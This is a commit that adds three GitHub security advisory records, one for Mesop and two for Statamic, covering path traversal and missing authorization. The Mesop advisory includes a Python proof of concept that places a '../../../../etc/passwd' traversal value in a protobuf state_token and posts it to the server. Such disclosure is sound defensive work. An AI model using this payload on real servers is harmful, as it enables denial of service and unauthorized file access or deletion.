
Commit c0a8e74

1 parent 4e270e7 commit c0a8e74

3 files changed

Lines changed: 212 additions & 0 deletions


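--- a/PATH-NOT-SHOWN/GHSA-8qvf-mr4w-9x2c.json
+++ b/PATH-NOT-SHOWN/GHSA-8qvf-mr4w-9x2c.json
@@ -0,0 +1,60 @@
+{
+"schema_version": "1.4.0",
+"id": "GHSA-8qvf-mr4w-9x2c",
+"modified": "2026-03-18T20:01:21Z",
+"published": "2026-03-18T20:01:21Z",
+"aliases": [
+"CVE-2026-33054"
+],
+"summary": "Mesop has a Path Traversal utilizing `FileStateSessionBackend` leads to Application Denial of Service and File Write/Deletion",
+"details": "#### Summary\nA Path Traversal vulnerability allows any user (or attacker) supplying an untrusted `state_token` through the UI stream payload to arbitrarily target files on the disk under the standard file-based runtime backend. This can result in application denial of service (via crash loops when reading non-msgpack target files as configurations), or arbitrary file manipulation.\n\n#### Details\nWhen the framework is configured to use the disk-based session backend (`FileStateSessionBackend`), the user's `state_token` actively dictates where the runtime session state is physically saved or queried natively on disk. \nIn `mesop/server/server.py`, specifically the `ui_stream` endpoint, the `event.state_token` is collected directly from the untrusted incoming protobuf message struct: `mesop.protos.ui_pb2.UserEvent`.\nBecause this is unconditionally passed to `FileStateSessionBackend._make_file_path(self, token)`, it evaluates standard path operators (e.g. `../../../`). \n\n```python\n# mesop/server/state_session.py\n def _make_file_path(self, token: str) -> Path:\n return self.base_dir / (self.prefix + token)\n```\nPython's standard library natively resolves OS traversal semantics allowing full escape from the `base_dir` destination intent.\n\n#### PoC\nAn attacker can utilize Python to craft and send a malicious Protobuf payload to the `/ui` stream.\n\n```python\nimport requests\nimport mesop.protos.ui_pb2 as pb # Assuming mesop protos are compiled\n\n# 1. Craft the malicious protobuf message\nuser_event = pb.UserEvent()\n# Escaping the tmp directory via path traversal to target a sensitive file, e.g., the root crontab or a system file\nuser_event.state_token = \"../../../../etc/passwd\" \n\n# Alternatively, targeting Windows:\n# user_event.state_token = \"..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts\"\n\nserialized_event = user_event.SerializeToString()\n\n# 2. Send the message to the ui stream endpoint\nheaders = {'Content-Type': 'application/x-protobuf'}\nresponse = requests.post(\n \"http://localhost:32123/ui\",\n data=serialized_event,\n headers=headers\n)\n\n# The server will attempt to parse /etc/passwd using msgpack, \n# resulting in a crash or reading/overwriting operations depending on the request type invoked.\nprint(response.content)\n```\n\n#### Impact\nThis vulnerability heavily exposes systems hosted utilizing `FileStateSessionBackend`. Unauthorized malicious actors could interact with arbitrary payloads overwriting or explicitly removing underlying service resources natively outside the application bounds.",
+"severity": [
+{
+"type": "CVSS_V3",
+"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
+}
+],
+"affected": [
+{
+"package": {
+"ecosystem": "PyPI",
+"name": "mesop"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "0"
+},
+{
+"fixed": "1.2.3"
+}
+]
+}
+],
+"database_specific": {
+"last_known_affected_version_range": "<= 1.2.2"
+}
+}
+],
+"references": [
+{
+"type": "WEB",
+"url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-8qvf-mr4w-9x2c"
+},
+{
+"type": "PACKAGE",
+"url": "https://github.com/mesop-dev/mesop"
+}
+],
+"database_specific": {
+"cwe_ids": [
+"CWE-22"
+],
+"severity": "CRITICAL",
+"github_reviewed": true,
+"github_reviewed_at": "2026-03-18T20:01:21Z",
+"nvd_published_at": null
+}
+}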
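--- a/PATH-NOT-SHOWN/GHSA-qm7r-wwq7-6f85.json
+++ b/PATH-NOT-SHOWN/GHSA-qm7r-wwq7-6f85.json
@@ -0,0 +1,76 @@
+{
+"schema_version": "1.4.0",
+"id": "GHSA-qm7r-wwq7-6f85",
+"modified": "2026-03-18T20:00:42Z",
+"published": "2026-03-18T20:00:42Z",
+"aliases": [
+"CVE-2026-33171"
+],
+"summary": "Statamic has a path traversal in file dictionary fieldtype",
+"details": "### Impact\n\nAuthenticated Control Panel users could read arbitrary `.json`, `.yaml`, and `.csv` files from the server by manipulating the file dictionary's `filename` configuration parameter in the fieldtype's endpoint.\n\n### Patches\n\nThis has been fixed in 5.73.14 and 6.7.0.",
+"severity": [
+{
+"type": "CVSS_V3",
+"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+}
+],
+"affected": [
+{
+"package": {
+"ecosystem": "Packagist",
+"name": "statamic/cms"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "6.0.0-alpha.1"
+},
+{
+"fixed": "6.7.0"
+}
+]
+}
+]
+},
+{
+"package": {
+"ecosystem": "Packagist",
+"name": "statamic/cms"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "0"
+},
+{
+"fixed": "5.73.14"
+}
+]
+}
+]
+}
+],
+"references": [
+{
+"type": "WEB",
+"url": "https://github.com/statamic/cms/security/advisories/GHSA-qm7r-wwq7-6f85"
+},
+{
+"type": "PACKAGE",
+"url": "https://github.com/statamic/cms"
+}
+],
+"database_specific": {
+"cwe_ids": [
+"CWE-22"
+],
+"severity": "MODERATE",
+"github_reviewed": true,
+"github_reviewed_at": "2026-03-18T20:00:42Z",
+"nvd_published_at": null
+}
+}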
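--- a/PATH-NOT-SHOWN/GHSA-wh3h-gvc4-cc2g.json
+++ b/PATH-NOT-SHOWN/GHSA-wh3h-gvc4-cc2g.json
@@ -0,0 +1,76 @@
+{
+"schema_version": "1.4.0",
+"id": "GHSA-wh3h-gvc4-cc2g",
+"modified": "2026-03-18T20:00:51Z",
+"published": "2026-03-18T20:00:51Z",
+"aliases": [
+"CVE-2026-33177"
+],
+"summary": "Statamic is missing authorization check on taxonomy term creation via fieldtype",
+"details": "### Impact\n\nLow-privileged Control Panel users could create taxonomy terms by submitting requests to the field action processing endpoint with attacker-controlled field definitions. This bypasses the authorization checks enforced on the standard taxonomy term creation endpoint.\n\n### Patches\n\nThis has been fixed in 5.73.14 and 6.7.0.",
+"severity": [
+{
+"type": "CVSS_V3",
+"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+}
+],
+"affected": [
+{
+"package": {
+"ecosystem": "Packagist",
+"name": "statamic/cms"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "6.0.0-alpha.1"
+},
+{
+"fixed": "6.7.0"
+}
+]
+}
+]
+},
+{
+"package": {
+"ecosystem": "Packagist",
+"name": "statamic/cms"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "0"
+},
+{
+"fixed": "5.73.14"
+}
+]
+}
+]
+}
+],
+"references": [
+{
+"type": "WEB",
+"url": "https://github.com/statamic/cms/security/advisories/GHSA-wh3h-gvc4-cc2g"
+},
+{
+"type": "PACKAGE",
+"url": "https://github.com/statamic/cms"
+}
+],
+"database_specific": {
+"cwe_ids": [
+"CWE-862"
+],
+"severity": "MODERATE",
+"github_reviewed": true,
+"github_reviewed_at": "2026-03-18T20:00:51Z",
+"nvd_published_at": null
+}
+}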
